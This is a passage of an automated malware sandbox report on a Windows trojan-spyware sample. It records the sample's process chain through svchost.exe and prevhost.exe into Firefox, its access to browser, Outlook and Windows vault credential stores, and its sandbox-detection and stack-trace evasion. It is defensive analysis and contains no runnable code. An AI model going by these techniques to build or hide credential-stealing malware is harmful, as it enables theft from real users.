Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051BB16B	5_2_051BB16B
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0512516C	5_2_0512516C
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050DF172	5_2_050DF172
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050FB1B0	5_2_050FB1B0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F70C0	5_2_050F70C0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0519F0CC	5_2_0519F0CC
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A70E9	5_2_051A70E9
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AF0E0	5_2_051AF0E0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A132D	5_2_051A132D
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050DD34C	5_2_050DD34C
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0513739A	5_2_0513739A
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F52A0	5_2_050F52A0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0510B2C0	5_2_0510B2C0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051912ED	5_2_051912ED
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A1D5A	5_2_051A1D5A
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F3D40	5_2_050F3D40
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A7D73	5_2_051A7D73
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0510FDC0	5_2_0510FDC0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05169C32	5_2_05169C32
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AFCF2	5_2_051AFCF2
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AFF09	5_2_051AFF09
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F1F92	5_2_050F1F92
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AFFB1	5_2_051AFFB1
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F9EB0	5_2_050F9EB0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05185910	5_2_05185910
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0510B950	5_2_0510B950
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F9950	5_2_050F9950
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0515D800	5_2_0515D800
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F38E0	5_2_050F38E0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AFB76	5_2_051AFB76
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0510FB80	5_2_0510FB80
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05165BF0	5_2_05165BF0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0512DBF9	5_2_0512DBF9
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AFA49	5_2_051AFA49
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A7A46	5_2_051A7A46
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05163A6C	5_2_05163A6C
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05135AA0	5_2_05135AA0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0518DAAC	5_2_0518DAAC
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0519DAC6	5_2_0519DAC6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F61E60	5_2_02F61E60
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F51301	5_2_02F51301
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F5B070	5_2_02F5B070
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F5B065	5_2_02F5B065
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F63740	5_2_02F63740
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6373B	5_2_02F6373B
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F65540	5_2_02F65540
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F5CF40	5_2_02F5CF40
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F5AF20	5_2_02F5AF20
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F7BCD0	5_2_02F7BCD0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F5CD20	5_2_02F5CD20
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5E4F6	5_2_04F5E4F6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5E88C	5_2_04F5E88C
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5D958	5_2_04F5D958
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5CBF8	5_2_04F5CBF8
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5CBA7	5_2_04F5CBA7

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F87E54 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F75130 appears 57 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F2B970 appears 275 times
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: String function: 0052F9F2 appears 40 times
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: String function: 00530A30 appears 46 times
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: String function: 00519CB3 appears 31 times
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: String function: 050DB970 appears 275 times
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: String function: 05137E54 appears 99 times
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: String function: 0516F290 appears 105 times
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: String function: 05125130 appears 56 times
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: String function: 0515EA12 appears 86 times

Source: 4sfN3Gx1vO.exe, 00000000.00000003.2084326425.0000000004053000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 4sfN3Gx1vO.exe
Source: 4sfN3Gx1vO.exe, 00000000.00000003.2083990526.00000000041FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 4sfN3Gx1vO.exe

Source: 4sfN3Gx1vO.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@4/4

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005837B5 GetLastError,FormatMessageW,

0_2_005837B5

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005710BF AdjustTokenPrivileges,CloseHandle,		0_2_005710BF
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_005716C3

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_005851CD

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0059A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0059A67C

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0058648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0058648E

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_005142A2

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

File created: C:\Users\user\AppData\Local\Temp\autF2F0.tmp

Jump to behavior

Source: 4sfN3Gx1vO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: prevhost.exe, 00000005.00000003.2578666068.0000000003280000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2581697269.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2578978579.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.00000000032CF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 4sfN3Gx1vO.exe	Virustotal: Detection: 72%
Source: 4sfN3Gx1vO.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\4sfN3Gx1vO.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Process created: C:\Windows\SysWOW64\prevhost.exe "C:\Windows\SysWOW64\prevhost.exe"
Source: C:\Windows\SysWOW64\prevhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Process created: C:\Windows\SysWOW64\prevhost.exe "C:\Windows\SysWOW64\prevhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\prevhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\prevhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 4sfN3Gx1vO.exe

Static file information: File size 1245696 > 1048576

Source: 4sfN3Gx1vO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4sfN3Gx1vO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4sfN3Gx1vO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4sfN3Gx1vO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4sfN3Gx1vO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4sfN3Gx1vO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 4sfN3Gx1vO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: prevhost.pdb source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2318966272.000000000070E000.00000002.00000001.01000000.00000005.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000000.2464236823.000000000070E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: prevhost.pdbGCTL source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp

Source: 4sfN3Gx1vO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4sfN3Gx1vO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4sfN3Gx1vO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4sfN3Gx1vO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4sfN3Gx1vO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005142DE

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00530A76 push ecx; ret	0_2_00530A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E5AF5 push esp; iretd	2_2_024E5B02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F1B0F push ss; iretd	2_2_024F1B6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F6383 push ds; iretd	2_2_024F6396
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F4853 push esp; retf	2_2_024F4856
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E4E5A push ebp; ret	2_2_024E4E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E4EA3 push ebp; ret	2_2_024E4E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F76A1 push cs; iretd	2_2_024F76AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F8FE6 push ss; iretd	2_2_024F9007
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F94AA push ecx; iretd	2_2_024F94AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E3540 push eax; ret	2_2_024E3542
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F4563 push ebx; retf	2_2_024F457B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F450D push ebx; retf	2_2_024F457B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx	2_2_02F309B6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050E09AD push ecx; mov dword ptr [esp], ecx	5_2_050E09B6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6886E push eax; retf	5_2_02F6885D
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6C034 push ecx; retf	5_2_02F6C037
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6415E push cs; iretd	5_2_02F64169
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6C499 push ebp; retf	5_2_02F6C49A
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F5E5CC push ss; iretd	5_2_02F5E629
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F525B2 push esp; iretd	5_2_02F525BF
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F65AA3 push ss; iretd	5_2_02F65AC4
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F51960 push ebp; ret	5_2_02F51955
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6B94F push FFFFFFDFh; ret	5_2_02F6B960
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F51917 push ebp; ret	5_2_02F51955
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F62E40 push ds; iretd	5_2_02F62E53
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F65F67 push ecx; iretd	5_2_02F65F6B
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6BCD5 pushad ; iretd	5_2_02F6BCD8
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5D50D push esp; ret	5_2_04F5D50E
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F54708 push edi; retf	5_2_04F54709
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_04F5D272 push ecx; ret	5_2_04F5D273

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0052F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0052F98E
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_005A1C41

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98643

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	API/Special instruction interceptor: Address: 1603C94
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\prevhost.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

